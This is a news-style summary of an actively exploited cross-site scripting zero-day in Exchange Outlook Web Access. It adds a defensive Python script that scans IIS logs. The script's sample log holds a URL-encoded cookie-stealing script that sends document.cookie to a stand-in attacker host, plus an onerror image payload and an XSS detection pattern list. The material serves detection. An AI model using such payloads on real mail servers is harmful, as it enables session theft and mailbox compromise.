
Microsoft Exchange Zero-Day Under Attack
TL;DR: A new zero-day vulnerability in Microsoft Exchange, identified as CVE-2026-42897, is being actively exploited. The flaw is a cross-site scripting (XSS) issue that allows attackers to compromise Outlook Web Access (OWA) mailboxes. Microsoft has not yet released a patch to fix the vulnerability.
Key facts
- Category: Cybersecurity
- Impact: Low
- Published
- Source: Dark Reading
Full summary
A new, unpatched zero-day vulnerability in Microsoft Exchange is being actively exploited, allowing attackers to compromise Outlook Web Access mailboxes.
A new zero-day vulnerability in Microsoft Exchange is being actively exploited by attackers. The security flaw, officially tracked as CVE-2026-42897, is a cross-site scripting (XSS) vulnerability. This type of flaw lets an attacker inject script into a web page that is then rendered by other users; because the injected script runs in the victim's browser within the application's own origin, it executes with the logged-in user's session and privileges. In this case the vulnerability affects Microsoft's Outlook Web Access (OWA), the web-based email client for Exchange Server. Active exploitation means threat actors are already using this previously unknown flaw against organizations. Microsoft has acknowledged the vulnerability but has not yet released a security patch for it.
The immediate impact is that attackers can compromise user mailboxes through OWA. A successful exploit could grant unauthorized access to sensitive information in email, including confidential business communications, personal data, and login credentials. That access could lead to significant data breaches, further network intrusion, or convincing phishing campaigns sent from a trusted internal account, which are harder to detect. Because no patch is available, any organization running on-premises Microsoft Exchange servers with OWA exposed to the internet is at immediate risk. Security teams should closely monitor these systems for signs of compromise.
Why it matters
An unpatched, actively exploited XSS vulnerability in a critical business tool like Exchange OWA presents a significant risk. It allows for account takeover and data theft, making it a potent threat for targeted attacks against organizations.
Business impact
Compromised email accounts can lead to major data breaches, financial loss, and reputational damage. Attackers can access sensitive corporate data, launch internal phishing campaigns, or use the compromised accounts for business email compromise (BEC) fraud. The lack of a patch heightens the risk.
⚡ Action needed
A patch is not yet available. Security teams should monitor for suspicious activity on Outlook Web Access (OWA) and prepare to apply a patch as soon as Microsoft releases it.
Action checklist
1. Identify all on-premises Microsoft Exchange servers running Outlook Web Access (OWA), and note which of them are reachable from the internet.
2. Monitor OWA logs for unusual or suspicious activity, such as requests carrying script or HTML markup in parameters.
3. Await an official security patch and guidance from Microsoft.
4. Prepare for emergency patching as soon as the update is released.
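As an added example for the monitoring step (it is not part of the Dark Reading report, and it does not encode any detail of CVE-2026-42897, whose exploit vector is not public on this page), the following Python scans IIS W3C log lines for requests to the OWA virtual directory whose query string, after URL decoding, contains generic XSS markers such as `<script`, inline event handlers or `document.cookie`. The log lines are constructed for illustration, and the field layout, marker list and function names are assumptions, not Microsoft's or any vendor's detection logic; treat hits as leads for triage rather than proof of exploitation.

```python
"""Flag OWA requests whose query strings carry XSS-style payloads (added example)."""
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample of IIS W3C log lines; not real OWA traffic. The two
# requests from 198.51.100.7 carry URL-encoded HTML/JavaScript, one of them
# double-encoded (%253C -> %3C -> <) to show why decoding must be repeated.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-01-01 08:00:01 10.0.0.5 GET /owa/ - 443 - 203.0.113.10 Mozilla/5.0 200
2026-01-01 08:00:05 10.0.0.5 GET /owa/auth/logon.aspx url=https%3A%2F%2Fmail.example.com%2Fowa%2F 443 - 203.0.113.10 Mozilla/5.0 200
2026-01-01 08:01:17 10.0.0.5 GET /owa/ ae=Item&a=Open&id=%3Cscript%3Elocation%3D%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E 443 CONTOSO\jdoe 198.51.100.7 Mozilla/5.0 200
2026-01-01 08:02:44 10.0.0.5 GET /ecp/ - 443 - 203.0.113.10 Mozilla/5.0 302
2026-01-01 08:03:02 10.0.0.5 GET /owa/ x=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E 443 - 198.51.100.7 curl/8.0 200
"""

# Generic XSS payload markers (an assumed, illustrative list), matched against
# the fully decoded query string. Extend with your own environment's patterns.
XSS_MARKERS = [
    re.compile(r"<\s*script", re.I),
    re.compile(r"<\s*(?:img|svg|iframe|object|embed)\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),        # inline event handlers: onerror=, onload=, ...
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"document\.cookie", re.I),
]


def parse_w3c(text):
    """Parse IIS W3C extended log text into a list of dicts keyed by field name.

    IIS writes one record per line and replaces spaces inside field values with
    '+', so splitting on whitespace is safe once the #Fields header is known.
    Lines whose token count does not match the header are skipped.
    """
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records


def decode_query(query, rounds=2):
    """URL-decode the query string repeatedly so double-encoded payloads surface.

    The first pass treats '+' as a space (form encoding); later passes only
    resolve remaining %XX sequences so a decoded literal '+' is preserved.
    """
    if query == "-":          # IIS logs '-' for an empty field
        return ""
    decoded = unquote_plus(query)
    for _ in range(rounds - 1):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def find_suspicious_owa_requests(records, path_prefix="/owa"):
    """Return OWA requests whose decoded query string matches an XSS marker."""
    findings = []
    for rec in records:
        if not rec["cs-uri-stem"].lower().startswith(path_prefix):
            continue
        decoded = decode_query(rec["cs-uri-query"])
        hits = [m.pattern for m in XSS_MARKERS if m.search(decoded)]
        if hits:
            findings.append({
                "time": f'{rec["date"]} {rec["time"]}',
                "client": rec["c-ip"],
                "user": rec["cs-username"],
                "stem": rec["cs-uri-stem"],
                "decoded_query": decoded,
                "markers": hits,
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_owa_requests(parse_w3c(SAMPLE_LOG)):
        print(f'{f["time"]} {f["client"]} {f["stem"]} user={f["user"]} markers={f["markers"]}')
        print(f'    {f["decoded_query"]}')
```

Run it against real logs by reading the `u_ex*.log` files from the IIS log directory into `parse_w3c` instead of `SAMPLE_LOG`; requests served to an authenticated user (`cs-username` not `-`) with a 200 status deserve the first look, since those are the ones that reached a rendering mailbox session. The marker list catches only crude, unobfuscated payloads, so a clean run is not evidence of absence.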
Primary source: Dark Reading